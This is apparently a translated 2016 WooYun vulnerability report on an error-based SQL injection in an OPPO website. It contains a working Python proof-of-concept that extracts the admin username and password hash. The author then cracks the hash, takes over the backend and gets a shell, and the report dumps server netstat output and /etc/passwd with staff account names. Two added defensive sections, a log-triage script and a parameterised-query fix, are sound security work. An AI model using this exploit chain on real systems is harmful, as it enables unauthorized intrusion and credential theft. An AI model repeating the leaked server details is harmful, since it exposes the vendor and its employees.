
Vulnerability summary

Defect ID: wooyun-2016-0179078

Title: Error-based SQL injection on an OPPO site (with Python PoC script), escalated to GETSHELL

Vendor: Guangdong OPPO Mobile Telecommunications Corp., Ltd.

Author: Mr.Q

Submitted: 2016-02-27 12:57

Fix deadline: 2016-03-03 13:00

Published: 2016-03-03 13:00

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor was notified but ignored the vulnerability

Source: http://www.wooyun.org. For questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-02-27: Details sent to the vendor, awaiting vendor response
2016-03-03: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Error-based SQL injection on an OPPO site (with Python PoC script), escalated to GETSHELL

Detailed description:

An OPPO site is vulnerable to error-based SQL injection: the sell_district_id parameter of showroom.php?act=get_store is concatenated into a MySQL query, and the database error text (including attacker-chosen data) is returned to the client.

QQ20160227-6.png


QQ20160227-7.png


Python script attached:

#!/usr/bin/env python3
# coding: utf-8
__author__ = 'Lu'
import re
import sys
import urllib.parse
import urllib.request


def verify(url):
    target = "%s/showroom.php?act=get_store&sell_district_id=1" % url
    # Error-based injection: COUNT(*) ... GROUP BY x with FLOOR(RAND(0)*2) inside x
    # makes MySQL compute the same group key twice, and the resulting
    # "Duplicate entry" error echoes the key, i.e. the CONCAT() holding the admin row.
    payload = " AND (SELECT 1879 FROM(SELECT COUNT(*),CONCAT(0x71626b7071,(select concat(0x23,0x23,username,0x23,0x23,password,0x23,0x23) from bd_admin where id=1 limit 1),0x7171767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    # URL-encode the payload: a raw space in the request line is rejected by http.client
    poc = target + urllib.parse.quote(payload, safe="")
    # 0x71626b7071 = 'qbkpq', 0x7171767871 = 'qqvxq'; the trailing 1 is FLOOR(RAND(0)*2)
    pattern = r"Duplicate entry 'qbkpq(.*?)qqvxq1'"
    try:
        # send the HTTP request
        response = urllib.request.urlopen(urllib.request.Request(poc))
        # handle the response
        data = response.read().decode("utf-8", "replace")
        result = re.findall(pattern, data)
        print("username#password: %s" % result)
    except Exception as e:
        print("Something happened...")
        print(e)


def main():
    args = sys.argv
    if len(args) == 2:
        verify(args[1])
    else:
        print("Usage: python %s url" % args[0])


if __name__ == '__main__':
    main()


Cracked the MD5 hash and logged into the admin backend

QQ20160227-8.png


QQ20160227-9.png


GETSHELL

masked region
1.http://**.**.**https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/a.php


QQ20160227-10.png


netstat -an | grep ESTABLISHED
tcp 0 0 192.168.0.21:36555 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:34326 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:80 192.168.2.5:35409 ESTABLISHED
tcp 0 0 192.168.0.21:32790 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:46251 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:38925 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:45137 218.75.154.137:443 ESTABLISHED
tcp 0 0 192.168.0.21:58753 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:39190 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:48091 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:55740 115.231.159.133:443 ESTABLISHED
tcp 0 0 192.168.0.21:45189 218.75.154.137:443 ESTABLISHED
tcp 0 0 192.168.0.21:53638 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:52250 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:37587 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:44610 198.11.178.243:23333 ESTABLISHED
tcp6 0 0 192.168.0.21:35940 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54957 117.79.131.86:80 ESTABLISHED
tcp6 0 0 192.168.0.21:58796 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:46477 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39783 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:57555 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58802 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:41560 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39498 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46070 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58944 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51262 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:45042 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58806 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:51920 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:50305 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46040 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58789 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:33979 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:55702 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:53109 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:55918 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:32812 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:33143 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:56389 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58599 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38080 192.168.0.23:46720 ESTABLISHED
tcp6 0 0 192.168.0.21:34809 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:58788 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:49518 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:57459 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:41422 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57341 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:41157 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57492 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46360 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:53509 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46852 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51921 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34070 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57646 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38595 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:44697 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58797 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:42793 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:47552 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:47160 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36648 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34582 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:47731 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:40307 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:33262 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:56565 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58803 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:46052 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:40891 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:45844 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36269 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54774 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:33626 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58519 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58545 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:49201 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57074 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39782 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:36481 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:44995 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57460 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:57351 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:49513 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:54684 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34811 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:49514 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:33639 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:35645 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36793 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:48795 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54505 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34482 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57459 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57743 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:36484 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:40622 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:42534 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57544 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:42616 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39726 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54105 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58800 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:59511 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57497 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:60372 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:57463 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:58804 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:48340 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:41836 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46622 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:43033 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:46064 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:48010 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:37545 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58668 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:43163 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51356 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:50538 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:56898 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38542 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:44322 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:49519 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:42243 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:34627 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:41580 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:40344 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58807 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:46556 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58791 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:40103 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:51898 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54728 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:54487 123.125.115.18:443 ESTABLISHED
tcp6 0 0 192.168.0.21:45534 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:38268 123.125.115.18:443 ESTABLISHED


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
#jhshi:x:1000:1000:,,,:/home/jhshi:/bin/bash
ychen:x:1001:1001:,,,:/home/ychen:/bin/bash
#mzhou:x:1002:1002:,,,:/home/mzhou:/bin/bash
nagios:x:104:106::/var/lib/nagios:/bin/false
nginx:x:105:107:nginx user,,,:/nonexistent:/bin/false
mysql:x:106:108:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:107:109::/var/run/dbus:/bin/false
#xtjiao:x:1003:1003:,,,:/home/xtjiao:/bin/bash
#zwzheng:x:1004:1004:,,,:/home/zwzheng:/bin/bash
syncer:x:1005:1005:,,,:/home/syncer:/bin/bash
sphinxsearch:x:108:110:Sphinx fulltext search service,,,:/var/run/sphinxsearch:/bin/false
redis:x:109:111:redis server,,,:/var/lib/redis:/bin/false
hwang:x:1006:1006:,,,:/home/hwang:/bin/bash
lchen:x:1007:1007:,,,:/home/lchen:/bin/bash
hbai:x:1002:1009:,,,:/home/hbai:/bin/bash
avahi:x:110:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
tomcat55:x:111:65534::/usr/share/tomcat5.5:/bin/false
mjzhou:x:1000:1008:,,,:/home/mjzhou:/bin/bash
qxu:x:1003:1010:,,,:/home/qxu:/bin/bash
wjzhu:x:1004:1011:,,,:/home/wjzhu:/bin/bash
cywang:x:1008:1012:,,,:/home/cywang:/bin/bash
zjli:x:1009:1013::/home/zjli:/bin/sh
yfhu:x:1010:1014::/home/yfhu:/bin/sh
ljni:x:1011:1015::/home/ljni:/bin/sh


Kernel: Linux hz97-164-21 2.6.32-5-amd64
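As an added triage example (not part of the report), the following parses the netstat and /etc/passwd listings above the way an incident responder would: it groups ESTABLISHED sockets by remote endpoint to make repeated connections to one external host on a non-web port stand out, and it flags UIDs shared between accounts, including commented-out ones. The sample text is an excerpt copied from the listings on this page; the ephemeral-port heuristic, the private-range check and the thresholds are assumptions.

```python
"""Triage helpers for the netstat and /etc/passwd listings above.

Added example, not part of the report. The sample text is an excerpt copied
from the listings on this page; the ephemeral-port heuristic, the private-range
check and the thresholds are assumptions made for this example.
"""
import re
from collections import Counter, defaultdict

NETSTAT_SAMPLE = """\
tcp 0 0 192.168.0.21:36555 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:34326 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:80 192.168.2.5:35409 ESTABLISHED
tcp 0 0 192.168.0.21:32790 198.11.178.243:23333 ESTABLISHED
tcp 0 0 192.168.0.21:45137 218.75.154.137:443 ESTABLISHED
tcp6 0 0 192.168.0.21:58796 192.168.0.22:33306 ESTABLISHED
tcp6 0 0 192.168.0.21:35940 58.250.207.48:443 ESTABLISHED
tcp6 0 0 192.168.0.21:39783 192.168.0.22:33306 ESTABLISHED
"""

PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
#jhshi:x:1000:1000:,,,:/home/jhshi:/bin/bash
#mzhou:x:1002:1002:,,,:/home/mzhou:/bin/bash
hbai:x:1002:1009:,,,:/home/hbai:/bin/bash
mjzhou:x:1000:1008:,,,:/home/mjzhou:/bin/bash
zjli:x:1009:1013::/home/zjli:/bin/sh
"""

PRIVATE_RE = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")   # RFC 1918 ranges
EPHEMERAL_MIN = 32768   # Linux default ip_local_port_range lower bound (assumption: stock sysctl)


def parse_netstat(text: str) -> list:
    """Rows of (local_ip, local_port, remote_ip, remote_port) for ESTABLISHED sockets."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[5] != "ESTABLISHED":
            continue
        lip, lport = f[3].rsplit(":", 1)
        rip, rport = f[4].rsplit(":", 1)
        rows.append((lip, int(lport), rip, int(rport)))
    return rows


def outbound_fanout(rows: list) -> Counter:
    """Connections the host most likely initiated (local side on an ephemeral port),
    keyed by remote ip:port so repeated beacons to one endpoint stand out."""
    c = Counter()
    for lip, lport, rip, rport in rows:
        if lport >= EPHEMERAL_MIN:
            c[f"{rip}:{rport}"] += 1
    return c


def suspicious_egress(fanout: Counter, min_conns: int = 2, web_ports=(80, 443)) -> list:
    """External destination, non-web port, more than one concurrent socket."""
    hits = []
    for remote, n in fanout.items():
        ip, port = remote.rsplit(":", 1)
        if not PRIVATE_RE.match(ip) and int(port) not in web_ports and n >= min_conns:
            hits.append((remote, n))
    return sorted(hits, key=lambda h: -h[1])


def parse_passwd(text: str) -> list:
    """Keep '#'-prefixed lines too: a UID 'retired' by commenting out and then handed
    to a new account means files owned by the old user now belong to the new one."""
    entries = []
    for line in text.splitlines():
        commented = line.startswith("#")
        f = line.lstrip("#").split(":")
        if len(f) != 7:
            continue
        entries.append({"name": f[0], "uid": int(f[2]), "shell": f[6], "commented": commented})
    return entries


def shared_uids(entries: list) -> dict:
    """UID -> names sharing it; commented-out accounts are marked with a leading '#'."""
    by_uid = defaultdict(list)
    for e in entries:
        by_uid[e["uid"]].append(("#" if e["commented"] else "") + e["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


if __name__ == "__main__":
    print(suspicious_egress(outbound_fanout(parse_netstat(NETSTAT_SAMPLE))))
    print(shared_uids(parse_passwd(PASSWD_SAMPLE)))
```

On the full listing the same grouping isolates the 198.11.178.243:23333 cluster from the ordinary HTTPS and MySQL (33306) traffic; netstat alone does not say which process owns those sockets, so the next step on the box would be `netstat -anp` or `ss -tnp` as root.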

QQ20160227-4.png


QQ20160227-5.png


Proof of vulnerability:

Already proven above.

Fix recommendation:

You're the professionals.
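The report leaves remediation to the vendor. As an added example (not OPPO's code, which is not on this page), here is what that fix looks like for the get_store lookup: an integer check plus a bound parameter for sell_district_id, and a salted slow hash in place of the bare MD5 that let the dumped admin password be cracked. The schema, the UNION payload (SQLite has no RAND(0) group-key trick, so it stands in for the report's payload) and the PBKDF2 settings are assumptions.

```python
"""Hardened version of the vulnerable parameter and of the password storage.

Added example, not OPPO code. Runs against an in-memory SQLite database with a
constructed schema that imitates the tables named in the report; the store
columns, the UNION payload and the PBKDF2 parameters are assumptions.
"""
import hashlib
import hmac
import os
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE store(id INTEGER PRIMARY KEY, sell_district_id INTEGER, name TEXT);
        INSERT INTO store VALUES (1, 1, 'store A'), (2, 2, 'store B');
        CREATE TABLE bd_admin(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO bd_admin VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


def get_store_vulnerable(con: sqlite3.Connection, sell_district_id: str) -> list:
    """String concatenation, the pattern behind the report: the parameter becomes SQL."""
    sql = "SELECT name FROM store WHERE sell_district_id=" + sell_district_id
    return [row[0] for row in con.execute(sql)]


def get_store_fixed(con: sqlite3.Connection, sell_district_id: str) -> list:
    """Validate the type first, then bind. The bound parameter alone stops the injection;
    the int() check on top turns bad input into a clean client error instead of a
    database error that would leak query details."""
    try:
        district = int(sell_district_id)
    except (TypeError, ValueError):
        raise ValueError("sell_district_id must be an integer")
    return [row[0] for row in con.execute(
        "SELECT name FROM store WHERE sell_district_id=?", (district,))]


# SQLite lacks the RAND(0) group-key trick, so a UNION payload stands in for the report's one
UNION_PAYLOAD = "1 UNION ALL SELECT username || ':' || password FROM bd_admin"


def demo() -> dict:
    con = make_db()
    leaked = get_store_vulnerable(con, UNION_PAYLOAD)          # admin row comes back with the stores
    try:
        get_store_fixed(con, UNION_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return {"leaked": leaked, "blocked": blocked, "normal": get_store_fixed(con, "1")}


# ---- password storage: the second weak link in the report's chain ----
ROUNDS = 100_000   # assumption; tune to the server's budget


def hash_password(pw: str) -> str:
    """Per-user random salt plus a slow KDF: a dumped hash can no longer be looked up
    in an MD5 table the way the report's admin hash was."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, ROUNDS)
    return f"pbkdf2_sha256${ROUNDS}${salt.hex()}${dk.hex()}"


def verify_password(pw: str, stored: str) -> bool:
    _algo, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", pw.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


if __name__ == "__main__":
    print(demo())
    print(verify_password("password", hash_password("password")))
```

Both halves matter for this report: the bound parameter closes the injection, and the salted KDF means a future dump of bd_admin does not hand an attacker the backend login that led to the web shell here.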

Copyright notice: please credit Mr.Q@WooYun when reposting


Vendor response

Vendor reply:

Severity: No impact, vendor ignored

Ignored at: 2016-03-03 13:00

Vendor comment:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None


Comments:

  1. 2016-02-27 13:05 | Mark0smith ( Regular white hat | Rank: 113 | Vulns: 48 )

    Charge for five minutes, dig bugs for two hours.

  2. 2016-02-27 13:10 | 木易 ( Regular white hat | Rank: 110 | Vulns: 25 | Throughout history Guiguzi, though one man, was stronger than an army of a million. One...)

    Dig bugs for two hours, submit in five minutes.

  3. 2016-02-27 13:58 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    Submit in five minutes, confirm in two hours.

  4. 2016-02-27 14:00 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    Confirm in two hours, fix in five minutes.

  5. 2016-02-27 14:01 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    Fix in five minutes, get criticized for two hours.

  6. 2016-02-27 14:02 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    Criticized for two hours, reflect for five minutes.

  7. 2016-02-27 14:04 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    Reflect for five minutes, stay alert for two hours.

  8. 2016-02-27 14:04 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    Alert for two hours, forget in five minutes.

  9. 2016-02-27 14:05 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    So how many minutes in total?

  10. 2016-02-27 14:07 | 玉林嘎 Verified white hat ( Core white hat | Rank: 933 | Vulns: 107 )

    265 minutes

  11. 2016-02-27 14:10 | 子非海绵宝宝 Verified white hat ( Core white hat | Rank: 1296 | Vulns: 131 | Carry on the SpongeBob spirit! You're not SpongeBob, how...)

    @玉林嘎 1000 minutes

  12. 2016-02-27 18:08 | 乌云来了 打雷啦 ( Intern white hat | Rank: 34 | Vulns: 5 | 乌云来了 打雷啦)

    Front row, learning from the master

  13. 2016-02-28 22:17 | 乌云大嫖客 ( Passer-by | Rank: 4 | Vulns: 1 | I am the number one show-off in the business)

    Watch for five minutes, show off for two hours.